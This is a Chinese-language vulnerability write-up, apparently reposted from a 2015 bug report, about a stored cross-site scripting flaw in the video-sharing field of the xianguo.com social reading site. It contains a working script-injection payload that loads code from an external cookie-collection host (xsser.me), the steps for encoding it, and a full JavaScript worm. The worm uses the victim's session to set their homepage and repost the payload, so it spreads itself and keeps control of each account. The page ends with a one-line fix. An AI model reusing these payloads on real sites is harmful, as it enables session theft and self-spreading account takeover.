

鲜果网Xss,可蠕虫,理论上可对用户持久控制

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果...

鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。

对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果首页,这样就可以实现对用户进行持久控制,这样用户每点登录一次鲜果就可以触发一次鲜果,一次又一次,一次又一次

演示地址:http://xianguo.com/1378148/
首先我们来到分享视频的地方,我们随便写一个视频 ,保存,截包。
在video这个地方会发现一个神奇的东西,

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D
进行一下 decodeURIComponent 解码

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}
看到了我们很熟悉的{}这种类型,弱弱的表示不懂的专业术语是什么.......
然后将我们的跨站代码进行Unicode编码
"><script src=http://xsser.me/pIQKKz></script>

\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E
然后将上面的编码插入到flash地址中

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}
进行 encodeURIComponent 编码

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D
然后替换掉原来的video中。

 

效果如下

 

COOKIES

 


 


其实拿到了COOKIES就可以登录了,但还是来说说持久控制。

// Minimal XHR helper object used by the proof-of-concept payload below.
// It runs inside a victim's xianguo.com page, so every request it makes is
// same-origin and the browser attaches the victim's session cookies to it
// automatically — that, not anything clever in this helper, is what lets a
// stored XSS act on the user's behalf. The `www.2cto.com` fragment on the
// closing brace of req() is a site watermark pasted into the listing, not code.
var pkav={
  // Returns an XMLHttpRequest, falling back to the two legacy ActiveX
  // progIds for old IE; returns false (not an object) when none is available.
  // Callers below never check for false, so a.open() would throw in that case.
  ajax:function(){
   var xmlHttp;
   try{
    xmlHttp=new XMLHttpRequest();
   }catch (e){
    try{
     xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
    }catch (e){
     try{
      xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
     }
     catch (e){
      return false;
     }
    }
   }
   return xmlHttp;
  },
  // Fires an asynchronous request.
  //   url      - target; nothing happens when falsy
  //   data     - string body sent as-is, or an object serialised as k=v&k=v
  //   method   - case-insensitive, defaults to GET
  //   callback - invoked with responseText only on readyState 4 / status 200;
  //              every other outcome is silently dropped
  req:function(url,data,method,callback){
   method=(method||"").toUpperCase();
   method=method||"GET";
   data=data||"";
   if(url){
    var a=this.ajax();
    a.open(method,url,true);
    if(method=="POST"){
     a.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    }
    a.onreadystatechange=function(){
     if (a.readyState==4 && a.status==200)
     {
      if(callback){
       callback(a.responseText);
      }
     }
    };
    if((typeof data)=="object"){
     var arr=[];
     // for-in also walks inherited enumerable properties; only the value is
     // URL-encoded, the key is concatenated raw.
     for(var i in data){
      arr.push(i+"="+encodeURIComponent(data[i]));
     }
     a.send(arr.join("&"));
    }else{
     a.send(data||null);
    }
   } www.2cto.com
  },
  // Convenience wrapper: GET with no body.
  get:function(url,callback){
   this.req(url,"","GET",callback);
  },
  // Convenience wrapper: form-encoded POST.
  post:function(url,data,callback){
   this.req(url,data,"POST",callback);
  }
 };
 if(!window.__x){
 pkav.post("http://xianguo.com/doings/sethome","type=snsSet",function(rs){});
 pkav.post("http://xianguo.com/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){});
   window.__x=1;
 }

第一个包是设置互动社区为首页
第二个包是发送一条微博

修复方案:加强过滤——例如对 video 字段中的 flash、imageurl 等 URL 做白名单校验,并在输出到页面时进行 HTML 属性编码,而不是把 JSON 原样拼进页面。

时间不足,不多打字了。。。
